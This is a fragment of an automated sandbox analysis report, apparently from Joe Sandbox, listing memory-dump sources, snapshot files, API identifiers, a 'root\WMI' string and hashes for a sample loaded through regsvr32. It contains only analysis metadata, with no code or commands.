                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocFree
                                                                    • String ID: root\WMI
                                                                    • API String ID: 344208780-2712063579
                                                                    • Opcode ID: 27f1dc1efe08ff44dfcc107919422ea478e86da9b32577a8d41c7a5024e8475e
                                                                    • Instruction ID: 8501448f49bd0d54e7a96cae47126a5dbe5d1470a9ea95e91685acdf97664cb5
                                                                    • Opcode Fuzzy Hash: 27f1dc1efe08ff44dfcc107919422ea478e86da9b32577a8d41c7a5024e8475e
                                                                    • Instruction Fuzzy Hash: 44712D32709BC291E760DB11F4647AAA7A0FB85348F504135DAED86AEADF7DD484CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
Similarity
• API ID: AllocString
• String ID: root\WMI
• API String ID: 2525500382-2712063579
Memory Dump Source
• Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
Similarity
• API ID: String$AllocCaptureContextExceptionFreeRaiseUninitializeUnwindabort
• String ID: root\WMI
• API String ID: 3978314060-2712063579
Memory Dump Source
• Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
Similarity
• API ID: String$AllocCaptureContextExceptionFreeRaiseUninitializeUnwindabort
• String ID: root\WMI
• API String ID: 3978314060-2712063579
Memory Dump Source
• Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0